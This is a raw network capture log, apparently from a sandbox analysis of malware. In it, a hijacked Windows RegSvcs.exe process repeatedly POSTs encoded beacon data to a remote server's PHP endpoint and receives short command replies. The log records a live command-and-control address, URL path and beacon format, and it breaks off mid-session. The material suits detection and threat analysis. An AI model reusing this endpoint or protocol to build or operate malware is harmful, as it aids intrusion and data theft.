Jan 8, 2025 08:44:33.512027025 CET | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:44:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.4 | 56124 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 08:44:35.036297083 CET | 312 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
Jan 8, 2025 08:44:35.733525991 CET | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:44:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.4 | 56125 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 08:44:37.361598969 CET | 160 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Jan 8, 2025 08:44:38.066068888 CET | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:44:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.4 | 56126 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 08:44:39.577842951 CET | 312 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
Jan 8, 2025 08:44:40.266031027 CET | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:44:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.4 | 56127 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 08:44:41.891217947 CET | 160 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Jan 8, 2025 08:44:42.597739935 CET | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:44:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.4 | 56128 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 08:44:44.110306025 CET | 312 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
Jan 8, 2025 08:44:44.827529907 CET | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:44:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.4 | 56129 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 08:44:46.456520081 CET | 160 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Jan 8, 2025 08:44:47.142812014 CET | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:44:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.4 | 56130 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 08:44:48.660511971 CET | 312 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
Jan 8, 2025 08:44:49.372358084 CET | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:44:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.4 | 56131 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 08:44:51.020490885 CET | 160 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Jan 8, 2025 08:44:51.730273962 CET | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:44:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.4 | 56132 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 08:44:53.256550074 CET | 312 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
Jan 8, 2025 08:44:53.964806080 CET | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:44:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.4 | 56133 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 08:44:55.656970024 CET | 160 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Jan 8, 2025 08:44:56.340996981 CET | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:44:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    77192.168.2.456134176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:44:57.865582943 CET | 312 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:44:58.567358971 CET | 196 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:44:58 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    78 | 192.168.2.4 | 56135 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:45:00.204128981 CET | 160 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:45:00.904352903 CET | 197 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:00 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    79 | 192.168.2.4 | 56136 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:45:02.421617031 CET | 312 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:45:03.143517971 CET | 196 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:03 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    80 | 192.168.2.4 | 56137 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:45:04.784568071 CET | 160 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:45:05.482996941 CET | 197 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:05 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    81 | 192.168.2.4 | 56138 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:45:07.000576973 CET | 312 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:45:07.716079950 CET | 196 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:07 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    82 | 192.168.2.4 | 56139 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:45:09.346865892 CET | 160 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:45:10.053905964 CET | 197 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:09 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    83 | 192.168.2.4 | 56140 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:45:11.563364983 CET | 312 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:45:12.274687052 CET | 196 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:12 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    84 | 192.168.2.4 | 56141 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:45:13.924757957 CET | 160 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:45:14.620548964 CET | 197 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:14 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    85 | 192.168.2.4 | 56142 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:45:16.141515970 CET | 312 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:45:16.834738016 CET | 196 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:16 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    86 | 192.168.2.4 | 56143 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:45:18.469571114 CET | 160 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:45:19.163832903 CET | 197 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:19 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    87 | 192.168.2.4 | 56144 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:45:20.688467979 CET | 312 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
